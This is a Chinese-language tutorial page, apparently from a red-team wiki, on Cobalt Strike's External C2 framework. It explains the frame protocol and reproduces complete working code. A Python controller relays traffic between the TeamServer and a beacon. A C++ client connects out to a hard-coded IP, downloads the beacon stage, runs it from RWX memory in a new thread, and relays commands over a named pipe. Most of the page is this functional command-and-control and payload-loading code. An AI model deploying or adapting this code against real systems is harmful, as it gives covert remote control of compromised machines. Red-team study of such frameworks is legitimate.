External C2

这东西其实依靠的就是SMB Beacon payload

介绍

首先什么是ExternalC2?

ExternalC2是由Cobalt Strike提出的一套规范/框架，它允许黑客根据需要对框架提供的默认HTTP(S)/DNS/SMB C2 通信通道进行扩展，简单说就是用户可以开发自己的控制器(服务端)和客户端(被控端)而不是直接使用CS自己的那套，控制器与客户端怎么来都是自己说了算。

第三方控制器(Third-party Controller)——负责与Cobalt Strike TeamServer(CS服务端)进行连接（通信方式使用TCP连接），并使用自定义C2通道与目标主机上的第三方客户端进行通信（通信方式自定义）
第三方客户端(Third-party Client)——负责使用自定义的C2通道与第三方控制器进行通信，最终将命令中转到SMB Beacon（通信方式使用命名管道）。
SMB Beacon——受害者机器上运行的Beacon

通信过程

要使用External C2需要先启动External C2监听器好等待连接，根据CS版本分为两种方法，使用脚本或者直接新建External C2监听器

在3.x时需要使用脚本来启动，脚本内容如下，然后在脚本管理器里加载此脚本 externalc2_start函数的作用就是接收两个参数，监听地址和监听端口

externalc2_start("0.0.0.0", 2222);

在4.x后不在需要使用这种方法作者进行了包装可以直接新建一个External C2监听器更加方便

ExternalC2启动后就会开始监听指定端口等待我们的第三方控制端连接进行通信

先来说一下整体的通信过程

最开始通信时，第三方控制器与External C2通过socket建立连接，然后发送一些选项，数据发送格式如下

4字节的数据块长度（低字节序）加一个数据块所组成

首先要发送以下的一些选项:

arch：指定beacon stage的架构（x86或x64）
pipename：命名管道（pipe）名称(用来与SMB beacon通信的)
block：sleep选项（以毫秒为单位睡眠时间）

所有选项发送完毕后，第三方控制器在发送一条go指令。这条指令表示一切ok，CS生成并发送beacon stage。第三方控制器随后会将这个beacon stage转发给第三方客户端，然后第三方客户端接收beacon stage并执行。

在一切完成后会产生一个如下的循环，不断转发CS的命令和客户端执行的结果

发送命令：CS服务端——>第三方控制器——>第三方客户端——>SMB beacon 返回结果：SMB beacon——>第三方控制器——>第三方客户端——>CS服务端

需要注意以上的数据传输格除了第三方控制器与第三方客户端的通信格式可以自定义，其他过程通信全是按照4字节的数据块长度+数据块组成

经典案例

先说一个经典案例然后在说一个别的。在这个经典案例中我们使用Python编写第三方服务端C++编写第三方客户端。

首先先在Cobalt Strike里起一个External C2监听器

第三方服务端

import socket
import struct
import time

class ExternalC2Controller:
    def __init__(self, port):
        self.port = port

    def encodeFrame(self, data):
        return struct.pack("<I", len(data)) + data

    def decodeFrame(self, data):
        len = struct.unpack("<I", data[0:3])
        body = data[4:]
        return (len, body)

    def sendToTS(self, data):
        self._socketTS.sendall(self.encodeFrame(data))

    def recvFromTS(self):
        data = ""
        _len =  self._socketTS.recv(4)
        l = struct.unpack("<I",_len)[0]
        while len(data) < l:
            data += self._socketTS.recv(l - len(data))
        return data

    def sendToBeacon(self, data):
        self._socketClient.sendall(self.encodeFrame(data))

    def recvFromBeacon(self):
        data = ""
        _len =  self._socketClient.recv(4)
        l = struct.unpack("<I",_len)[0]
        while len(data) < l:
            data += self._socketClient.recv(l - len(data))
        return data

    def run(self):
        # First thing, wait for a connection from our custom beacon
        self._socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
        self._socketBeacon.bind(("0.0.0.0", 8081))
        self._socketBeacon.listen(1)
        self._socketClient = self._socketBeacon.accept()[0]
        print "Received C2 connection"

        # Now we have a beacon connection, we kick off comms with CS External C2
        self._socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
        self._socketTS.connect(("127.0.0.1", self.port))

        # Send out config options
        self.sendToTS("arch=x86")
        self.sendToTS("pipename=xpntest")
        self.sendToTS("block=500")
        self.sendToTS("go")

        # Receive the beacon payload from CS to forward to our custom beacon
        data = self.recvFromTS()

        while(True):
            print "Sending %d bytes to beacon" % len(data)
            self.sendToBeacon(data)

            data = self.recvFromBeacon()
            print "Received %d bytes from beacon" % len(data)

            print "Sending %d bytes to TS" % len(data)
            self.sendToTS(data)

            data = self.recvFromTS()
            print "Received %d bytes from TS" % len(data)

controller = ExternalC2Controller(3389)
controller.run()

https://gist.github.com/xpn/bb82f2ca4c8e9866c12c54baeb64d771

第三方客户端编写

#include "stdafx.h"

// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {

    HANDLE threadHandle;
    DWORD threadId = 0;
    char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(alloc, payload, len);

    threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId);
 }

// Sends data to our C2 controller received from our injected beacon
void sendData(SOCKET sd, const char *data, DWORD len) {
    char *buffer = (char *)malloc(len + 4);
  if (buffer == NULL)
    return;

    DWORD bytesWritten = 0, totalLen = 0;

    *(DWORD *)buffer = len;
    memcpy(buffer + 4, data, len);

    while (totalLen < len + 4) {
        bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0);
        totalLen += bytesWritten;
    }
    free(buffer);
}

// Receives data from our C2 controller to be relayed to the injected beacon
char *recvData(SOCKET sd, DWORD *len) {
    char *buffer;
    DWORD bytesReceived = 0, totalLen = 0;

    *len = 0;

    recv(sd, (char *)len, 4, 0);
    buffer = (char *)malloc(*len);
  if (buffer == NULL)
    return NULL;

    while (totalLen < *len) {
        bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0);
        totalLen += bytesReceived;
    }
    return buffer;
}

// Creates a new C2 controller connection for relaying commands
SOCKET createC2Socket(const char *addr, WORD port) {
    WSADATA wsd;
    SOCKET sd;
    SOCKADDR_IN sin;
    WSAStartup(0x0202, &wsd);

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.S_un.S_addr = inet_addr(addr);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    connect(sd, (SOCKADDR*)&sin, sizeof(sin));

    return sd;
}

// Connects to the name pipe spawned by the injected beacon
HANDLE connectBeaconPipe(const char *pipeName) {
    HANDLE beaconPipe;

    beaconPipe = CreateFileA(pipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, NULL, NULL);

    return beaconPipe;
}

// Receives data from our injected beacon via a named pipe
char *recvFromBeacon(HANDLE pipe, DWORD *len) {
    char *buffer;
    DWORD bytesRead = 0, totalLen = 0;

    *len = 0;

    ReadFile(pipe, len, 4, &bytesRead, NULL);
    buffer = (char *)malloc(*len);

    while (totalLen < *len) {
        ReadFile(pipe, buffer + totalLen, *len - totalLen, &bytesRead, NULL);
        totalLen += bytesRead;
    }
    return buffer;
}

// Write data to our injected beacon via a named pipe
void sendToBeacon(HANDLE pipe, const char *data, DWORD len) {
    DWORD bytesWritten = 0;
    WriteFile(pipe, &len, 4, &bytesWritten, NULL);
    WriteFile(pipe, data, len, &bytesWritten, NULL);
}

int main()
{
    DWORD payloadLen = 0;
    char *payloadData = NULL;
    HANDLE beaconPipe = INVALID_HANDLE_VALUE;

    // Create a connection back to our C2 controller
    SOCKET c2socket = createC2Socket("192.168.1.65", 8081);
    payloadData = recvData(c2socket, &payloadLen);

    // Start the CS beacon
    spawnBeacon(payloadData, payloadLen);

    // Loop until the pipe is up and ready to use
    while (beaconPipe == INVALID_HANDLE_VALUE) {
        // Create our IPC pipe for talking to the C2 beacon
        Sleep(500);
        beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest");
    }

    while (true) {
        // Start the pipe dance
        payloadData = recvFromBeacon(beaconPipe, &payloadLen);
        if (payloadLen == 0) break;

        sendData(c2socket, payloadData, payloadLen);
        free(payloadData);

        payloadData = recvData(c2socket, &payloadLen);
        if (payloadLen == 0) break;

        sendToBeacon(beaconPipe, payloadData, payloadLen);
        free(payloadData);
    }


    return 0;
}

https://gist.github.com/xpn/08cf7001780020bb60c5c773cec5f839

https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/

代码相关的东西就自己多读一下吧都不难

另一个ExternalC2框架

https://github.com/SpiderLabs/DoHC2 这个感兴趣的可以看看

上一页Malleable C2 下一页CS证书相关

最后更新于4年前